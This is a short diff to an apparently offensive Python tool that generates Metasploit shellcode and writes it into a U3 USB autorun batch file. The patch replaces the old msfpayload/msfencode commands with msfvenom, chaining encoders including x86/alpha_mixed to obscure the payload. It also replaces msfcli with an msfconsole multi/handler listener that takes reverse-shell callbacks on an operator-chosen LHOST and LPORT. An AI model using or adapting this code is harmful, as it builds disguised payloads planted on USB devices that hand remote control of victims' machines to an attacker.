--- src/generator.py	2015-06-16 12:54:31.336510552 +0100
+++ src/generator.py	2015-06-16 12:58:46.936549581 +0100
@@ -219,7 +219,7 @@
 	   if port is not socket.inet_aton(port):
 		banner.print_banner()
                 print ' Generating Shellcode Please Wait...'
-                subprocess.Popen('msfpayload %s EXITFUNC=thread  LHOST=%s LPORT=%s R  | msfencode -c 2 -e %s -t raw  | msfencode  -a x86 -e  x86/alpha_mixed -t raw BufferRegister=EAX > resource/payload.txt' % (shellcode[payload-1], addr, port,  encoders[encode-1] ), stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True).wait()
+                subprocess.Popen('msfvenom -p %s EXITFUNC=thread LHOST=%s LPORT=%s -f raw -i 2 -e %s -f raw -a x86 -e x86/alpha_mixed -f raw BufferRegister=EAX --platform Windows -o resource/payload.txt' % (shellcode[payload-1], addr, port, encoders[encode-1]), stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True).wait()
                 alpha = open('resource/payload.txt', 'r')
                 text = alpha.readline()
                 file = open('resource/LaunchU3.bat', 'w')
@@ -258,7 +258,7 @@
 
     if listener == 'yes' or listener == 'y':
 	banner.print_banner()
-        subprocess.Popen('msfcli exploit/multi/handler PAYLOAD=%s LHOST=0.0.0.0 LPORT=%s E' % (shellcode[payload-1], port), shell=True).wait()
+        subprocess.Popen('msfconsole -x \'use exploit/multi/handler;set PAYLOAD %s;set LHOST 0.0.0.0;set LPORT %s;exploit\'' % (shellcode[payload-1], port), shell=True).wait()
 
     else:
 	  banner.print_banner()
